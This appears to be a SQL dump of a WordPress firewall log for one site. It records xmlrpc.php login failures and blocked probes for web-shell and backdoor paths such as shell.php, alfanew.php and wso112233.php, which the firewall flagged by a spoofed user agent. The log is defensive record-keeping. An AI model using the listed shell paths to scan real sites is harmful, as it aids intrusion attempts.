(51318, 0.000000, 1712320098.317074, '\0\0\0\0\0\0\0\0\0\0ÿÿÊYC', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51319, 0.000000, 1712320101.427062, '\0\0\0\0\0\0\0\0\0\0ÿÿÊ/&¼', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51320, 0.000000, 1712320103.992363, '\0\0\0\0\0\0\0\0\0\0ÿÿ;¶+G', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51321, 0.000000, 1712320110.522938, '\0\0\0\0\0\0\0\0\0\0ÿÿzªÀŒ', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51012, 1712231006.942874, 1712231006.231900, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹;»', 0, 403, 0, 0, 0, 'https://happythinking.com/plugins/content/apismtp/apismtp.php.suspected?test=hello', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3BsdWdpbnMvY29udGVudC9hcGlzbXRwL2FwaXNtdHAucGhwLnN1c3BlY3RlZA==","category":"brute-force","ssl":1}'),
(51006, 1712207906.497525, 1712207906.081100, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ðD', 0, 403, 0, 0, 0, 'https://www.happythinking.com/wp-login.php?action=register', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWxvZ2luLnBocA==","category":"brute-force","ssl":1}'),
(51011, 1712231000.320371, 1712230999.820800, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹;»', 0, 403, 0, 0, 0, 'https://happythinking.com/ALFA_DATA/alfacgiapi/perl.alfa', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L0FMRkFfREFUQS9hbGZhY2dpYXBpL3BlcmwuYWxmYQ==","category":"brute-force","ssl":1}'),
(51021, 1712288983.087563, 1712288982.750200, '\0\0\0\0\0\0\0\0\0\0ÿÿõÍ`', 0, 403, 0, 0, 0, 'https://happythinking.com/dropdown.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2Ryb3Bkb3duLnBocA==","category":"brute-force","ssl":1}'),
(51344, 0.000000, 1712320236.714731, '\0\0\0\0\0\0\0\0\0\0ÿÿg/#Û', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51345, 0.000000, 1712320251.825595, '\0\0\0\0\0\0\0\0\0\0ÿÿg¦eé', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51039, 1712310108.300530, 1712310108.016400, '\0\0\0\0\0\0\0\0\0\0ÿÿõÍ`', 0, 403, 0, 0, 0, 'https://happythinking.com/simple.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3NpbXBsZS5waHA=","category":"brute-force","ssl":1}'),
(51022, 1712288981.564362, 1712288981.131200, '\0\0\0\0\0\0\0\0\0\0ÿÿõÍ`', 0, 403, 0, 0, 0, 'https://happythinking.com/admin.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2FkbWluLnBocA==","category":"brute-force","ssl":1}'),
(51005, 1712207926.505042, 1712207926.015700, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ðD', 0, 403, 0, 0, 0, 'https://www.happythinking.howequipmentworks.com/404.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"LzQwNC5waHA=","category":"brute-force","ssl":1}'),
(51040, 1712310106.012429, 1712310105.699900, '\0\0\0\0\0\0\0\0\0\0ÿÿõÍ`', 0, 403, 0, 0, 0, 'https://happythinking.com/css.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2Nzcy5waHA=","category":"brute-force","ssl":1}'),
(51020, 1712288985.046460, 1712288984.766100, '\0\0\0\0\0\0\0\0\0\0ÿÿõÍ`', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-seo.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLXNlby5waHA=","category":"brute-force","ssl":1}'),
(50504, 1711381140.875168, 1711381140.535800, '\0\0\0\0\0\0\0\0\0\0ÿÿæ-Ã', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-content/plugins/x/index.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy94L2luZGV4LnBocA==","category":"brute-force","ssl":1}'),
(50503, 1711381144.047307, 1711381143.603300, '\0\0\0\0\0\0\0\0\0\0ÿÿæ-Ã', 0, 403, 0, 0, 0, 'https://happythinking.com/epinyins.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2VwaW55aW5zLnBocA==","category":"brute-force","ssl":1}'),
(50469, 1711358930.323627, 1711358929.987900, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/install.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2luc3RhbGwucGhw","category":"brute-force","ssl":1}'),
(50475, 1711358845.511275, 1711358845.199800, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/makeasmtp.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L21ha2Vhc210cC5waHA=","category":"brute-force","ssl":1}'),
(50470, 1711358919.355833, 1711358918.733400, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/fw.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2Z3LnBocA==","category":"brute-force","ssl":1}'),
(50471, 1711358894.810193, 1711358894.515400, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/alfanew.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2FsZmFuZXcucGhw","category":"brute-force","ssl":1}'),
(50502, 1711381146.013840, 1711381145.633200, '\0\0\0\0\0\0\0\0\0\0ÿÿæ-Ã', 0, 403, 0, 0, 0, 'https://happythinking.com/admin.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2FkbWluLnBocA==","category":"brute-force","ssl":1}'),
(50472, 1711358881.461597, 1711358881.174500, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-atom.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWF0b20ucGhw","category":"brute-force","ssl":1}'),
(50473, 1711358871.660299, 1711358871.368300, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/wso112233.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dzbzExMjIzMy5waHA=","category":"brute-force","ssl":1}'),
(50474, 1711358860.643957, 1711358860.257200, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-sigunq.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLXNpZ3VucS5waHA=","category":"brute-force","ssl":1}'),
(50501, 1711381148.197806, 1711381147.756100, '\0\0\0\0\0\0\0\0\0\0ÿÿæ-Ã', 0, 403, 0, 0, 0, 'https://happythinking.com/dropdown.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2Ryb3Bkb3duLnBocA==","category":"brute-force","ssl":1}'),
(50476, 1711358830.798273, 1711358830.474500, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/dropdown.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2Ryb3Bkb3duLnBocA==","category":"brute-force","ssl":1}'),
(50477, 1711358817.966415, 1711358817.617900, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/ws.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dzLnBocA==","category":"brute-force","ssl":1}'),
(50500, 1711381151.865931, 1711381151.550900, '\0\0\0\0\0\0\0\0\0\0ÿÿæ-Ã', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-seo.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLXNlby5waHA=","category":"brute-force","ssl":1}'),
(50478, 1711358797.295240, 1711358797.027400, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/shell.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3NoZWxsLnBocA==","category":"brute-force","ssl":1}'),
(50479, 1711358786.364068, 1711358786.050500, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/as.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2FzLnBocA==","category":"brute-force","ssl":1}'),
(50480, 1711358780.092011, 1711358779.768800, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/ini.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2luaS5waHA=","category":"brute-force","ssl":1}'),
(50481, 1711358776.478663, 1711358776.114600, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/themes.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3RoZW1lcy5waHA=","category":"brute-force","ssl":1}'),
